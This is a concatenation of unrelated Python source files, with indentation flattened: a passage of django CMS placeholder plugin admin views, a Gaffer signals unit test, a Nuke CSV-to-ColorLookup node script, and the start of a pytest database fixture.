admin_form = AdminForm(form, fieldsets=[(None, {'fields': fields})], prepopulated_fields={},
model_admin=self)
media = self.media + admin_form.media
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'title': opts.verbose_name,
'plugin': None,
'plugin_id': None,
'adminform': admin_form,
'add': False,
'is_popup': True,
'media': media,
'opts': opts,
'change': True,
'save_as': False,
'has_add_permission': False,
'window_close_timeout': 10,
}
if cancel_clicked:
# cancel button was clicked
context.update({
'cancel': True,
})
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
if not cancel_clicked and request.method == 'POST' and saved_successfully:
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
return render_to_response('admin/cms/page/plugin/change_form.html', context, RequestContext(request))
class PlaceholderAdminMixin(object):
def get_urls(self):
"""
Register the plugin specific urls (add/edit/copy/remove/move)
"""
from django.conf.urls import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns(
'',
pat(r'copy-plugins/$', self.copy_plugins),
pat(r'add-plugin/$', self.add_plugin),
pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
pat(r'delete-plugin/([0-9]+)/$', self.delete_plugin),
pat(r'clear-placeholder/([0-9]+)/$', self.clear_placeholder),
pat(r'move-plugin/$', self.move_plugin),
)
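        # The generated view names follow "<app_label>_<module_name>_<method name>"
        # (e.g., hypothetically, "cms_page_add_plugin"); add_plugin() below relies
        # on this scheme when it reverses the edit/delete plugin URLs.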
return url_patterns + super(PlaceholderAdminMixin, self).get_urls()
def has_add_plugin_permission(self, request, placeholder, plugin_type):
if not permissions.has_plugin_permission(request.user, plugin_type, "add"):
return False
if not placeholder.has_add_permission(request):
return False
return True
def has_copy_plugin_permission(self, request, source_placeholder, target_placeholder, plugins):
if not source_placeholder.has_add_permission(request) or not target_placeholder.has_add_permission(
request):
return False
for plugin in plugins:
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "add"):
return False
return True
def has_change_plugin_permission(self, request, plugin):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "change"):
return False
if not plugin.placeholder.has_change_permission(request):
return False
return True
def has_move_plugin_permission(self, request, plugin, target_placeholder):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "change"):
return False
if not target_placeholder.has_change_permission(request):
return False
return True
def has_delete_plugin_permission(self, request, plugin):
if not permissions.has_plugin_permission(request.user, plugin.plugin_type, "delete"):
return False
placeholder = plugin.placeholder
if not placeholder.has_delete_permission(request):
return False
return True
def has_clear_placeholder_permission(self, request, placeholder):
if not placeholder.has_delete_permission(request):
return False
return True
def post_add_plugin(self, request, placeholder, plugin):
pass
def post_copy_plugins(self, request, source_placeholder, target_placeholder, plugins):
pass
def post_edit_plugin(self, request, plugin):
pass
def post_move_plugin(self, request, source_placeholder, target_placeholder, plugin):
pass
def post_delete_plugin(self, request, plugin):
pass
def post_clear_placeholder(self, request, placeholder):
pass
def get_placeholder_template(self, request, placeholder):
pass
@method_decorator(require_POST)
@xframe_options_sameorigin
def add_plugin(self, request):
"""
POST request should have the following data:
- placeholder_id
- plugin_type
- plugin_language
- plugin_parent (optional)
"""
plugin_type = request.POST['plugin_type']
placeholder_id = request.POST.get('placeholder_id', None)
parent_id = request.POST.get('parent_id', None)
if parent_id:
warnings.warn("parent_id is deprecated and will be removed in 3.1, use plugin_parent instead",
DeprecationWarning)
if not parent_id:
parent_id = request.POST.get('plugin_parent', None)
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
if not self.has_add_plugin_permission(request, placeholder, plugin_type):
return HttpResponseForbidden(force_unicode(_('You do not have permission to add a plugin')))
parent = None
language = request.POST.get('plugin_language') or get_language_from_request(request)
try:
has_reached_plugin_limit(placeholder, plugin_type, language,
template=self.get_placeholder_template(request, placeholder))
except PluginLimitReached as er:
return HttpResponseBadRequest(er)
# page add-plugin
if not parent_id:
position = request.POST.get('plugin_order',
CMSPlugin.objects.filter(language=language, placeholder=placeholder).count())
# in-plugin add-plugin
else:
parent = get_object_or_404(CMSPlugin, pk=parent_id)
placeholder = parent.placeholder
position = request.POST.get('plugin_order',
CMSPlugin.objects.filter(language=language, parent=parent).count())
# placeholder (non-page) add-plugin
# Sanity check to make sure we're not getting bogus values from JavaScript:
if settings.USE_I18N:
if not language or not language in [lang[0] for lang in settings.LANGUAGES]:
return HttpResponseBadRequest(force_unicode(_("Language must be set to a supported language!")))
if parent and parent.language != language:
return HttpResponseBadRequest(force_unicode(_("Parent plugin language must be same as language!")))
else:
language = settings.LANGUAGE_CODE
plugin = CMSPlugin(language=language, plugin_type=plugin_type, position=position, placeholder=placeholder)
if parent:
plugin.position = CMSPlugin.objects.filter(parent=parent).count()
plugin.insert_at(parent, position='last-child', save=False)
plugin.save()
self.post_add_plugin(request, placeholder, plugin)
response = {
'url': force_unicode(
admin_reverse("%s_%s_edit_plugin" % (self.model._meta.app_label, self.model._meta.module_name),
args=[plugin.pk])),
'delete': force_unicode(
admin_reverse("%s_%s_delete_plugin" % (self.model._meta.app_label, self.model._meta.module_name),
args=[plugin.pk])),
'breadcrumb': plugin.get_breadcrumb(),
}
return HttpResponse(json.dumps(response), content_type='application/json')
@method_decorator(require_POST)
@xframe_options_sameorigin
@wrap_transaction
def copy_plugins(self, request):
"""
POST request should have the following data:
- source_language
- source_placeholder_id
- source_plugin_id (optional)
- target_language
- target_placeholder_id
- target_plugin_id (optional, new parent)
"""
source_language = request.POST['source_language']
source_placeholder_id = request.POST['source_placeholder_id']
source_plugin_id = request.POST.get('source_plugin_id', None)
target_language = request.POST['target_language']
target_placeholder_id = request.POST['target_placeholder_id']
target_plugin_id = request.POST.get('target_plugin_id', None)
source_placeholder = get_object_or_404(Placeholder, pk=source_placeholder_id)
target_placeholder = get_object_or_404(Placeholder, pk=target_placeholder_id)
if not target_language or not target_language in get_language_list():
return HttpResponseBadRequest(force_unicode(_("Language must be set to a supported language!")))
if source_plugin_id:
source_plugin = get_object_or_404(CMSPlugin, pk=source_plugin_id)
reload_required = requires_reload(PLUGIN_COPY_ACTION, [source_plugin])
if source_plugin.plugin_type == "PlaceholderPlugin":
                # if it is a PlaceholderReference plugin, only copy the plugins it references
inst, cls = source_plugin.get_plugin_instance(self)
plugins = inst.placeholder_ref.get_plugins_list()
else:
plugins = list(
source_placeholder.cmsplugin_set.filter(tree_id=source_plugin.tree_id, lft__gte=source_plugin.lft,
rght__lte=source_plugin.rght).order_by('tree_id', 'level',
'position'))
else:
plugins = list(
source_placeholder.cmsplugin_set.filter(language=source_language).order_by('tree_id', 'level',
'position'))
reload_required = requires_reload(PLUGIN_COPY_ACTION, plugins)
if not self.has_copy_plugin_permission(request, source_placeholder, target_placeholder, plugins):
return HttpResponseForbidden(force_unicode(_('You do not have permission to copy these plugins.')))
if target_placeholder.pk == request.toolbar.clipboard.pk and not source_plugin_id and not target_plugin_id:
            # if we copy a whole placeholder to the clipboard, create a PlaceholderReference plugin instead and fill
            # it with the content of the source_placeholder.
ref = PlaceholderReference()
ref.name = source_placeholder.get_label()
ref.plugin_type = "PlaceholderPlugin"
ref.language = target_language
ref.placeholder = target_placeholder
ref.save()
ref.copy_from(source_placeholder, source_language)
else:
copy_plugins.copy_plugins_to(plugins, target_placeholder, target_language, target_plugin_id)
plugin_list = CMSPlugin.objects.filter(language=target_language, placeholder=target_placeholder).order_by(
'tree_id', 'level', 'position')
reduced_list = []
for plugin in plugin_list:
reduced_list.append(
{
'id': plugin.pk, 'type': plugin.plugin_type, 'parent': plugin.parent_id,
'position': plugin.position, 'desc': force_unicode(plugin.get_short_description()),
'language': plugin.language, 'placeholder_id': plugin.placeholder_id
}
)
self.post_copy_plugins(request, source_placeholder, target_placeholder, plugins)
json_response = {'plugin_list': reduced_list, 'reload': reload_required}
return HttpResponse(json.dumps(json_response), content_type='application/json')
@xframe_options_sameorigin
def edit_plugin(self, request, plugin_id):
plugin_id = int(plugin_id)
cms_plugin = get_object_or_404(CMSPlugin.objects.select_related('placeholder'), pk=plugin_id)
instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
if not self.has_change_plugin_permission(request, cms_plugin):
return HttpResponseForbidden(force_unicode(_("You do not have permission to edit this plugin")))
plugin_admin.cms_plugin_instance = cms_plugin
try:
plugin_admin.placeholder = cms_plugin.placeholder
except Placeholder.DoesNotExist:
pass
if request.method == "POST":
            # set the continue flag, otherwise plugin_admin will redirect to the list
            # view, which doesn't actually exist
request.POST['_continue'] = True
if request.POST.get("_cancel", False):
# cancel button was clicked
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': cms_plugin,
'is_popup': True,
"type": cms_plugin.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(escapejs(cms_plugin.get_instance_icon_src())),
'alt': force_escape(escapejs(cms_plugin.get_instance_icon_alt())),
'cancel': True,
}
instance = cms_plugin.get_plugin_instance()[0]
if instance:
context['name'] = force_unicode(instance)
else:
# cancelled before any content was added to plugin
cms_plugin.delete()
context.update({
"deleted": True,
'name': force_unicode(cms_plugin),
})
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
if not instance:
# instance doesn't exist, call add view
response = plugin_admin.add_view(request)
else:
# already saved before, call change view
            # we actually have the instance here, but since we don't override the
            # change_view method, it is better to let it be loaded again, so
            # just pass the id to plugin_admin
response = plugin_admin.change_view(request, str(plugin_id))
if request.method == "POST" and plugin_admin.object_successfully_changed:
self.post_edit_plugin(request, plugin_admin.saved_object)
saved_object = plugin_admin.saved_object
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': saved_object,
'is_popup': True,
'name': force_unicode(saved_object),
"type": saved_object.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(saved_object.get_instance_icon_src()),
'alt': force_escape(saved_object.get_instance_icon_alt()),
}
return render_to_response('admin/cms/page/plugin/confirm_form.html', context, RequestContext(request))
return response
@method_decorator(require_POST)
@xframe_options_sameorigin
def move_plugin(self, request):
"""
        POST request with the following parameters:
        - plugin_id
        - placeholder_id
        - plugin_language (optional)
        - plugin_parent (optional)
        - plugin_order (array, optional)
"""
plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
placeholder = Placeholder.objects.get(pk=request.POST['placeholder_id'])
parent_id = request.POST.get('plugin_parent', None)
language = request.POST.get('plugin_language', None)
source_placeholder = plugin.placeholder
if not parent_id:
parent_id = None
else:
parent_id = int(parent_id)
if not language and plugin.language:
language = plugin.language
order = request.POST.getlist("plugin_order[]")
if not self.has_move_plugin_permission(request, plugin, placeholder):
return HttpResponseForbidden(force_unicode(_("You have no permission to move this plugin")))
if plugin.parent_id != parent_id:
if parent_id:
parent = CMSPlugin.objects.get(pk=parent_id)
if parent.placeholder_id != placeholder.pk:
return HttpResponseBadRequest(force_unicode('parent must be in the same placeholder'))
if parent.language != language:
return HttpResponseBadRequest(force_unicode('parent must be in the same language as plugin_language'))
else:
parent = None
plugin.move_to(parent, position='last-child')
if not placeholder == source_placeholder:
try:
template = self.get_placeholder_template(request, placeholder)
has_reached_plugin_limit(placeholder, plugin.plugin_type, plugin.language, template=template)
except PluginLimitReached as er:
return HttpResponseBadRequest(er)
plugin.save()
for child in plugin.get_descendants(include_self=True):
child.placeholder = placeholder
child.language = language
child.save()
plugins = CMSPlugin.objects.filter(parent=parent_id, placeholder=placeholder, language=language).order_by('position')
x = 0
for level_plugin in plugins:
if order:
x = 0
found = False
for pk in order:
if level_plugin.pk == int(pk):
level_plugin.position = x
level_plugin.save()
found = True
break
x += 1
if not found:
return HttpResponseBadRequest('order parameter did not have all plugins of the same level in it')
else:
level_plugin.position = x
level_plugin.save()
x += 1
self.post_move_plugin(request, source_placeholder, placeholder, plugin)
json_response = {'reload': requires_reload(PLUGIN_MOVE_ACTION, [plugin])}
return HttpResponse(json.dumps(json_response), content_type='application/json')
@xframe_options_sameorigin
def delete_plugin(self, request, plugin_id):
plugin = get_object_or_404(CMSPlugin.objects.select_related('placeholder'), pk=plugin_id)
if not self.has_delete_plugin_permission(request, plugin):
return HttpResponseForbidden(force_unicode(_("You do not have permission to delete this plugin")))
plugin_cms_class = plugin.get_plugin_class()
plugin_class = plugin_cms_class.model
opts = plugin_class._meta
using = router.db_for_write(plugin_class)
app_label = opts.app_label
(deleted_objects, perms_needed, protected) = get_deleted_objects(
[plugin], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied(_("You do not have permission to delete this plugin"))
obj_display = force_unicode(plugin)
self.log_deletion(request, plugin, obj_display)
plugin.delete()
self.message_user(request, _('The %(name)s plugin "%(obj)s" was deleted successfully.') % {
'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj_display)})
self.post_delete_plugin(request, plugin)
return HttpResponseRedirect(admin_reverse('index', current_app=self.admin_site.name))
plugin_name = force_unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": plugin_name}
else:
title = _("Are you sure?")
context = {
"title": title,
"object_name": plugin_name,
"object": plugin,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"app_label": app_label,
}
return TemplateResponse(request, "admin/cms/page/plugin/delete_confirmation.html", context,
current_app=self.admin_site.name)
@xframe_options_sameorigin
def clear_placeholder(self, request, placeholder_id):
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
if not self.has_clear_placeholder_permission(request, placeholder):
return HttpResponseForbidden(force_unicode(_("You do not have permission to clear this placeholder")))
language = request.GET.get('language', None)
plugins = placeholder.get_plugins(language)
opts = Placeholder._meta
using = router.db_for_write(Placeholder)
app_label = opts.app_label
(deleted_objects, perms_needed, protected) = get_deleted_objects(
plugins, opts, request.user, self.admin_site, using)
obj_display = force_unicode(placeholder)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
return HttpResponseForbidden(force_unicode(_("You do not have permission to clear this placeholder")))
self.log_deletion(request, placeholder, obj_display)
placeholder.clear()
self.message_user(request, _('The placeholder "%(obj)s" was cleared successfully.') % {
'obj': force_unicode(obj_display)})
self.post_clear_placeholder(request, placeholder)
return HttpResponseRedirect(admin_reverse('index', current_app=self.admin_site.name))
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": obj_display}
else:
title = _("Are you sure?")
context = {
"title": title,
"object_name": _("placeholder"),
"object": placeholder,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"app_label": app_label,
}
return TemplateResponse(request, "admin/cms/page/plugin/delete_confirmation.html", context,
current_app=self.admin_site.name)
class PlaceholderAdmin(PlaceholderAdminMixin, ModelAdmin):
def __init__(self, *args, **kwargs):
warnings.warn("Class PlaceholderAdmin is deprecated and will be removed in 3.1. "
"Instead, combine PlaceholderAdminMixin with admin.ModelAdmin.", DeprecationWarning)
super(PlaceholderAdmin, self).__init__(*args, **kwargs)
class FrontendEditableAdmin(FrontendEditableAdminMixin):
def __init__(self, *args, **kwargs):
warnings.warn("Class FrontendEditableAdmin is deprecated and will be removed in 3.1. "
"Instead, use FrontendEditableAdminMixin.", DeprecationWarning)
super(FrontendEditableAdmin, self).__init__(*args, **kwargs)
|
|
##########################################################################
#
# Copyright (c) 2011-2013, John Haddon. All rights reserved.
# Copyright (c) 2011-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import StringIO
import unittest
import weakref
import sys
import gc
import IECore
import Gaffer
import GafferTest
class SignalsTest( GafferTest.TestCase ) :
def test( self ) :
def f( a ) :
return int( a )
s = Gaffer.Signal1()
c = s.connect( f )
self.assertEqual( c.connected(), True )
self.assertEqual( c.blocked(), False )
self.assertEqual( s( 5.5 ), 5 )
c.block()
self.assertEqual( c.blocked(), True )
c.unblock()
self.assertEqual( c.blocked(), False )
c.disconnect()
self.assertEqual( c.connected(), False )
def testDisconnectWhenSignalDies( self ) :
def f( a ) :
return int( a )
s = Gaffer.Signal1()
c = s.connect( f )
self.assert_( c.connected() )
del s
self.assert_( not c.connected() )
def test2( self ) :
def f( a, b ) :
return a * b
s = Gaffer.Signal2()
c = s.connect( f )
self.assertEqual( s( 2.0, 4.0 ), 8.0 )
def testCircularRef( self ) :
def default( a ) :
return -1
class A( IECore.V3f ) :
def __init__( self ) :
IECore.V3f.__init__( self )
self.signal = Gaffer.Signal1()
def f( self, n ) :
return int( n * 2 )
a1 = A()
a2 = A()
		# connect a slot so that the signal returns a value of -1 by default
defaultConnection = a2.signal.connect( default )
self.assertEqual( a2.signal( 2 ), -1 )
		# connect a method of a1 to the signal on a2
a1.c = a2.signal.connect( Gaffer.WeakMethod( a1.f ) )
self.assertEqual( a2.signal( 2 ), 4 )
# connect a method of a2 to the signal on a1
a2.c = a1.signal.connect( Gaffer.WeakMethod( a2.f ) )
self.assert_( a2.c.connected() )
self.assertEqual( a1.signal( 2 ), 4 )
# we should be able to delete a1 and have it die
# straight away, because the use of WeakMethods in
# the connections should prevent any circular references.
del a1
self.assertEqual( a2.signal( 2 ), -1 )
# as a1 is now dead, a2's connection to a1.signal
# should have died.
self.assert_( not a2.c.connected() )
def testDeletionOfConnectionDisconnects( self ) :
def default( a ) :
return -1
def f( a ) :
return int( a * 10 )
s = Gaffer.Signal1()
dc = s.connect( default )
self.assertEqual( s( 1 ), -1 )
c = s.connect( f )
self.assertEqual( s( 1 ), 10 )
del c
self.assertEqual( s( 1 ), -1 )
def testMany( self ) :
class S( IECore.V3f ) :
instances = 0
def __init__( self, parent ) :
IECore.V3f.__init__( self )
S.instances += 1
self.children = []
self.numConnections = 0
self.signal = Gaffer.Signal1()
if parent :
self.c = parent.signal.connect( self.f )
parent.numConnections += 1
parent.children.append( self )
def f( self, a ) :
r = 1
if self.numConnections!=0 :
r += self.signal( a )
return r
def build( parent, depth=0 ) :
if( depth > 15 ) :
return
else :
s1 = S( parent )
s2 = S( parent )
build( s1, depth + 1 )
build( s2, depth + 1 )
s = S( None )
build( s )
s.signal( 1 )
## Check that Exceptions being thrown in callbacks don't cause additional references
# to be created which would stop or delay collection. This tests a bug whereby the use
# of PyErr_Print caused tracebacks to be stored in sys.last_traceback, which meant that
# references to the T instance below were kept until another exception was thrown.
def testExceptionRefCounting( self ) :
class T( object ) :
def __init__( self, s ) :
# note the use of Gaffer.WeakMethod to avoid creating a circular reference
# from self -> self.connection -> self.callback -> self. this is critical
# when connecting methods of class to a signal.
self.connection = s.memberAddedSignal().connect( Gaffer.WeakMethod( self.callback ) )
def callback( self, s, n ) :
raise Exception
s = Gaffer.StandardSet()
t = T( s )
w = weakref.ref( t )
realStdErr = sys.stderr
sio = StringIO.StringIO()
try :
sys.stderr = sio
s.add( Gaffer.Node() )
finally :
sys.stderr = realStdErr
del t
self.assert_( w() is None )
self.assert_( "Exception" in sio.getvalue() )
def test0Arity( self ) :
def one() :
return 1
s = Gaffer.Signal0()
c = s.connect( one )
self.assertEqual( s(), 1 )
def testGenericPythonSignals( self ) :
def one() :
return "one"
def two() :
return "two"
s = Gaffer.Signal0()
c1 = s.connect( one )
c2 = s.connect( two )
self.assertEqual( s(), "two" )
def testGenericPythonSignalsWithCombiner( self ) :
def myCombiner( slotResults ) :
l = []
for r in slotResults :
l.append( r )
return l
def add( a, b ) :
return a + b
def mult( a, b ) :
return a * b
s = Gaffer.Signal2( myCombiner )
addConnection = s.connect( add )
multConnection = s.connect( mult )
self.assertEqual( s( 2, 4 ), [ 6, 8 ] )
def testPythonResultCombinersCanSkipSlots( self ) :
def myCombiner( slotResults ) :
for r in slotResults :
if r :
return r
return False
def slot1() :
self.numCalls += 1
return True
def slot2() :
self.numCalls += 1
return False
s = Gaffer.Signal0( myCombiner )
c1 = s.connect( slot1 )
c2 = s.connect( slot2 )
self.numCalls = 0
self.assertEqual( s(), True )
self.assertEqual( self.numCalls, 1 )
def testGroupingAndOrdering( self ) :
values = []
def f( value ) :
values.append( value )
s = Gaffer.Signal0()
c1 = s.connect( IECore.curry( f, "one" ) )
c2 = s.connect( IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "one", "two" ] )
del values[:]
c1 = s.connect( 1, IECore.curry( f, "one" ) )
c2 = s.connect( 0, IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "two", "one" ] )
del values[:]
c1 = s.connect( IECore.curry( f, "one" ) )
c2 = s.connect( 0, IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "two", "one" ] )
def testSlotQueries( self ) :
def f() :
pass
s = Gaffer.Signal0()
self.assertTrue( s.empty() )
self.assertEqual( s.num_slots(), 0 )
c = s.connect( f )
self.assertFalse( s.empty() )
self.assertEqual( s.num_slots(), 1 )
del c
self.assertTrue( s.empty() )
self.assertEqual( s.num_slots(), 0 )
def testNonScopedConnection( self ) :
self.numCalls = 0
def f() :
self.numCalls += 1
s = Gaffer.Signal0()
c = s.connect( f, scoped = False )
self.assertEqual( self.numCalls, 0 )
s()
self.assertEqual( self.numCalls, 1 )
c.block( True )
s()
self.assertEqual( self.numCalls, 1 )
c.block( False )
s()
self.assertEqual( self.numCalls, 2 )
# If we drop our reference to the slot,
# it should still be alive because the
# signal is referencing it (because it
# is connected).
w = weakref.ref( f )
del f
self.assertTrue( w() is not None )
# And it should still be triggered when
# we call the signal.
s()
self.assertEqual( self.numCalls, 3 )
# And it should finally die when the
# signal dies.
del s
self.assertTrue( w() is None )
if __name__ == "__main__":
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Foundry Nuke - CSV File to ColorLookup Node
===============================================
Defines *The Foundry Nuke* *ColorLookup* node creation objects from *.csv*
files.
"""
# from __future__ import unicode_literals
import csv
try:
import nuke
except ImportError:
pass
import os
from collections import namedtuple
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2016 - Colour Developers'
__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['COLOR_LOOKUP_CURVES_TEMPLATE',
'Point',
'CurvesInformation',
'Curve',
'Lookup',
'curve_data',
'parse_curve_data_header',
'parse_curve_data',
'curve_axis_values',
'curve',
           'curves_information_to_lookup',
'format_curve_data',
'color_lookup_node',
'import_curves_data_csv_file']
COLOR_LOOKUP_CURVES_TEMPLATE = (
"""master {{{0}}}
red {{{1}}}
green {{{2}}}
blue {{{3}}}
alpha {{{4}}}""")
Point = namedtuple('Point', ('x', 'y'))
CurvesInformation = namedtuple('CurvesInformation',
('curve', 'axis', 'values'))
class Curve(object):
"""
Stores curve data with the :class:`Point` class.
Parameters
----------
x : tuple or list
x: X axis data.
y : tuple or list
y: Y axis data.
"""
def __init__(self, x=None, y=None):
points = []
if not x:
for i in range(len(y)):
points.append(Point(float(i) / len(y), y[i]))
elif not y:
for i in range(len(x)):
points.append(Point(x[i], float(i) / len(x)))
else:
for i in range(len(x)):
points.append(Point(x[i], y[i]))
self.points = points
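# A quick sketch of Curve's behaviour: Curve(y=[0.0, 1.0]) yields the points
# (0.0, 0.0) and (0.5, 1.0), i.e. missing x values are spread evenly over the
# [0, 1) range, while Curve(x=[0.0, 1.0], y=[0.0, 1.0]) pairs the values directly.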
class Lookup(object):
"""
Defines the lookup master, red, green, blue and alpha curves using the
:class:`Curve` class.
Parameters
----------
master_curve : Curve
master_curve: Master curve.
red_curve : Curve
red_curve: Red curve.
green_curve : Curve
green_curve: Green curve.
blue_curve : Curve
blue_curve: Blue curve.
alpha_curve : Curve
alpha_curve: Alpha curve.
"""
def __init__(self,
master_curve=None,
red_curve=None,
green_curve=None,
blue_curve=None,
alpha_curve=None):
self.master_curve = master_curve if isinstance(
master_curve, Curve) else Curve()
self.red_curve = red_curve if isinstance(
red_curve, Curve) else Curve()
self.green_curve = green_curve if isinstance(
green_curve, Curve) else Curve()
self.blue_curve = blue_curve if isinstance(
blue_curve, Curve) else Curve()
self.alpha_curve = alpha_curve if isinstance(
alpha_curve, Curve) else Curve()
def curve_data(file):
"""
Reads the curve data from given CSV file.
Parameters
----------
file : unicode
file: CSV file.
Returns
-------
list
CSV data.
"""
with open(file, 'rb') as csv_file:
return list(csv.reader(csv_file, delimiter=','))
def parse_curve_data_header(header):
"""
Parses the curve data header.
Parameters
----------
header : list
header: Curve data header.
Returns
-------
CurvesInformation
Curves information.
"""
curves_information = []
for name, axis in [x.lower().split() for x in header]:
curves_information.append(CurvesInformation(name, axis, []))
return curves_information
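# For reference, a hypothetical CSV header this parser accepts looks like
# "Master x,Master y,Red x,Red y,...": each column name is lower-cased and
# split into a (curve, axis) pair, so "Red x" becomes ('red', 'x').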
def parse_curve_data(data):
"""
Parses the curve data.
Parameters
----------
data : list
data: Curve data.
Returns
-------
CurvesInformation
Curves information.
"""
curves_information = parse_curve_data_header(data.pop(0))
for row in data:
for i, column in enumerate(row):
curves_information[i].values.append(column)
return curves_information
def curve_axis_values(curves_information, name, axis):
"""
Returns the curve axis values.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
name : unicode
name: Curve name.
axis : unicode
axis: Axis.
Returns
-------
CurvesInformation
Curves information.
"""
for curve_information in curves_information:
if curve_information.curve == name and curve_information.axis == axis:
return curve_information.values
return []
def curve(curves_information, name):
"""
    Returns a curve using the given :class:`CurvesInformation` class instances.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
name : unicode
name: Curve name.
Returns
-------
Curve
Curve.
"""
return Curve(x=curve_axis_values(curves_information, name, 'x'),
y=curve_axis_values(curves_information, name, 'y'))
def curves_information_to_lookup(curves_information):
"""
    Returns a :class:`Lookup` class instance using the given
    :class:`CurvesInformation` class instances.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
Returns
-------
Lookup
Lookup.
"""
return Lookup(curve(curves_information, 'master'),
curve(curves_information, 'red'),
curve(curves_information, 'green'),
curve(curves_information, 'blue'),
curve(curves_information, 'alpha'))
def format_curve_data(curve):
"""
Formats given :class:`Curve` class instance data.
Parameters
----------
curve : Curve
curve: Curve.
Returns
-------
unicode
Formatted curve data.
"""
curve_data = ''
for point in curve.points:
curve_data += 'x{0} {1} '.format(point.x, point.y)
return 'curve C {0}'.format(
        curve_data) if curve_data != '' else 'curve C 0 1'
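# As a rough example, format_curve_data(Curve(x=[0, 1], y=[0, 1])) returns
# 'curve C x0 0 x1 1 ', while a curve with no points falls back to 'curve C 0 1'.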
def color_lookup_node(file, template=COLOR_LOOKUP_CURVES_TEMPLATE):
"""
Creates the *Nuke* *ColorLookup* node code using given CSV file.
Parameters
----------
file : unicode
file: CSV file.
template : unicode, optional
template: Template used for formatting.
Returns
-------
ColorLookup
ColorLookup node.
"""
color_lookup = nuke.nodes.ColorLookup(name='ColorLookup')
lookup = curves_information_to_lookup(parse_curve_data(curve_data(file)))
color_lookup.knob('lut').fromScript(
template.format(format_curve_data(lookup.master_curve),
format_curve_data(lookup.red_curve),
format_curve_data(lookup.green_curve),
format_curve_data(lookup.blue_curve),
format_curve_data(lookup.alpha_curve)))
basename = os.path.splitext(os.path.basename(file))[0].split("-")
if len(basename) > 1:
label = "\n".join([s.strip() for s in basename])
else:
label = basename[0]
color_lookup.knob('label').setValue(label)
return color_lookup
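# A hypothetical usage sketch from the Nuke script editor, assuming the CSV
# columns follow the "<curve> <axis>" header convention described above:
#   node = color_lookup_node('/path/to/my_grade-curves.csv')
# The node label is derived from the file basename, split on "-".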
def import_curves_data_csv_file():
"""
    Imports the user curves data CSV file as a *Nuke* *ColorLookup* node.
Returns
-------
ColorLookup
ColorLookup node.
"""
file = nuke.getFilename('Choose ColorLookup Node Curves Data CSV File',
'*.csv')
if file is not None:
if os.path.exists(file):
return color_lookup_node(file)
|
|
from datetime import datetime
import pytest
from app.domain.entities import Admin, Host, Service
from app.domain.errors import NoAdministratorFound
from app.repository.sqlalchemy import (SqlalchemyAdminRepo, SqlalchemyHostRepo,
SqlalchemyServiceRepo)
from app.repository.sqlalchemy.models import db
from tests.unit.utils import FlaskAppContextEnvironment
class DbEnvironment(FlaskAppContextEnvironment):
@pytest.fixture
def table(self, app_context):
db.drop_all()
db.create_all()
yield
